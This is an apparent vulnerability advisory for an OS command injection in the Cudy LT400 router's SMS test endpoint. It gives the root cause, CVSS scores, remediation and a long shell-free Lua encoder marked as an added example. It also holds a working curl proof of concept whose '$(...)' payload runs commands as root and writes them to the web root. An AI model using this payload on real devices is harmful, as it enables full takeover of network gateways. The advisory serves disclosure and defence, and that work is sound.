**Source:** https://sploitus.com/exploit?id=53F5E36D-6808-5272-9FCC-3FD96158324F
# Cudy LT400: Authenticated Root OS Command Injection in `luci-app-gcom` (SMS "send test")

- **Class:** CWE-78, OS Command Injection
- **Impact:** Arbitrary command execution as **root** (full device compromise)
- **Affected:** Cudy LT400, firmware **1.15.27** (LEDE/OpenWrt 17.01.5), HW rev LT400A R6
- **Component:** `/usr/lib/lua/luci/controller/gcom.lua` → `action_send_test`
- **Endpoint:** `POST /cgi-bin/luci/admin/network/gcom/sms/sendtest` (params `content`, `phone`)
- **Discovered by:** archnexus707 · 2026 · responsibly disclosed to Cudy

---

## Summary

The Cudy LT400 4G LTE router runs a vendor-customised LEDE/OpenWrt 17.01.5 image with a
LuCI web interface. Cudy's proprietary `luci-app-gcom` package contains an OS command
injection in its SMS *send test message* handler. The HTTP parameters `content` and
`phone` are interpolated, without adequate sanitisation, into a `/bin/sh` pipeline run
via `luci.util.exec()`. Because `uhttpd` runs as **root**, an authenticated administrator
achieves arbitrary command execution as root.

## Root cause

Reconstructed `action_send_test` (controller ships as Lua bytecode; logic recovered from
string constants):

```lua
local content = "[Cudy]" .. luci.http.formvalue("content")   -- attacker-controlled
content = content:gsub('"', '')          -- only double quotes removed (INSUFFICIENT)
luci.util.exec(string.format(
    'echo -n "%s" | iconv -f UTF-8 -t UCS-2LE | hexdump ...', content))  -- SHELL SINK
```

The only neutralisation is removing the `"` character. The value is then placed inside a
**double-quoted** shell word (`echo -n "%s"`). In POSIX `sh`, command substitution
`$(...)` and back-ticks are **still evaluated inside double quotes**, so a payload of
`content=$(id)` executes `id`. No quote breakout is required, which is why stripping `"`
alone is ineffective. Both `content` and `phone` reach the shell and are injectable.

## Proof of concept

> Authorised testing only, against devices you own or are authorised to assess.

```bash
# After authenticating to LuCI and obtaining the session cookie + CSRF token:
curl -s -b "sysauth=$COOKIE" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "iface=4g" \
  --data-urlencode "phone=10086" \
  --data-urlencode 'content=$({ id; uname -a; } > /www/poc.txt 2>&1)' \
  "http:///cgi-bin/luci/admin/network/gcom/sms/sendtest"

curl -s "http:///poc.txt"
# -> uid=0(root) gid=0(root)
#    Linux LT400 4.4.140 ... mips GNU/Linux
```

A self-contained C exploit is provided: [`cudy_lt400_gcom_rce.c`](./cudy_lt400_gcom_rce.c)
(raw sockets, no dependencies). It logs in, lifts the CSRF token, injects a command,
exfiltrates output, and cleans up.

```bash
gcc -O2 -D_GNU_SOURCE -o cudy_rce cudy_lt400_gcom_rce.c
./cudy_rce   "id; uname -a"
```

## Impact

Complete root compromise of the device. As the network gateway it enables traffic
interception/manipulation, DNS/credential harvesting, persistent backdoors, LAN pivoting,
modem/SIM/SMS abuse, and denial of service.

## Severity

- **CVSS v3.1:** 7.2 (High), `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`
- **CVSS v4.0:** `CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`

## Remediation

Do not pass user input into a shell. Encode the SMS body via an argument-vector API or
feed `iconv` from stdin/a temp file rather than `echo -n "..."`. If a shell is
unavoidable, strictly allow-list SMS content and escape `$()`, back-ticks, `\`, `;`, `|`,
`&`, and newlines (stripping `"` alone is insufficient). Audit the sibling
`action_send_sms` (`AT+CMGW="%s"` from `phone`) for AT-command injection. Drop
`uhttpd`/CGI privileges from root where feasible.
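The cleanest form of the first remediation is to drop the shell entirely: the pipeline only converts the SMS body to UCS-2LE hex, which can be done in Lua. The block below is an added example, not Cudy's code or LuCI's API; the function names and the two-hex-digits-per-byte, low-byte-first layout are assumptions, since the page elides the original `hexdump` arguments.

```lua
-- Added example, not Cudy's code: a shell-free replacement for
--   echo -n "..." | iconv -f UTF-8 -t UCS-2LE | hexdump ...
-- Pure Lua 5.1 (the LEDE/OpenWrt 17.01 interpreter): `content` stays data
-- and never reaches /bin/sh. Function names below are assumed.

-- Decode UTF-8 into a table of code points. Minimal validation: rejects bad
-- lead bytes and truncated sequences; overlong forms are not checked.
local function utf8_codepoints(s)
  local cps, i, n = {}, 1, #s
  while i <= n do
    local c = s:byte(i)
    local cp, len
    if c < 0x80 then cp, len = c, 1
    elseif c >= 0xC2 and c < 0xE0 then cp, len = c - 0xC0, 2
    elseif c >= 0xE0 and c < 0xF0 then cp, len = c - 0xE0, 3
    elseif c >= 0xF0 and c < 0xF5 then cp, len = c - 0xF0, 4
    else return nil, "invalid UTF-8 lead byte at offset " .. i end
    for j = 1, len - 1 do
      local cc = s:byte(i + j)
      if not cc or cc < 0x80 or cc > 0xBF then
        return nil, "truncated UTF-8 sequence at offset " .. i
      end
      cp = cp * 64 + (cc - 0x80)
    end
    cps[#cps + 1] = cp
    i = i + len
  end
  return cps
end

-- UCS-2LE as hex, low byte first (assumed layout; the page elides the hexdump
-- arguments). Code points above U+FFFF do not fit in UCS-2: reject, not mangle.
local function encode_ucs2le_hex(s)
  local cps, err = utf8_codepoints(s)
  if not cps then return nil, err end
  local out = {}
  for _, cp in ipairs(cps) do
    if cp > 0xFFFF then return nil, "non-BMP character cannot be encoded in UCS-2" end
    out[#out + 1] = string.format("%02x%02x", cp % 256, math.floor(cp / 256))
  end
  return table.concat(out)
end

-- Handler shape replacing the shell sink: same "[Cudy]" prefix, no exec().
local function build_sms_hex(formvalue)
  return encode_ucs2le_hex("[Cudy]" .. (formvalue or ""))
end

-- The page's payload "$(id)" is now just five characters to encode.
print(build_sms_hex("$(id)"))
```

The hex string can then be handed to the modem's AT command path as before; the same approach should be applied to `phone` in `action_send_sms`, where only digits and a leading `+` need to be accepted.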

## Differentiation from prior art

- ≠ **CVE-2024-39209** (`luci-app-sms-tool`, a different community package).
- ≠ **CVE-2026-4537** (Cudy **TR1200** `ipsec.lua` `action_ipsec_conn`: different
  product/controller/function). Same *class*, separate instance.
- Public Cudy LT400 CVEs to date are XSS (e.g. CVE-2023-31852), not command injection in
  the gcom/SMS path.

## Disclosure

Reported to Cudy (`support@cudy.com`) under coordinated disclosure; CVE ID requested via
MITRE CNA-LR. 90-day disclosure window.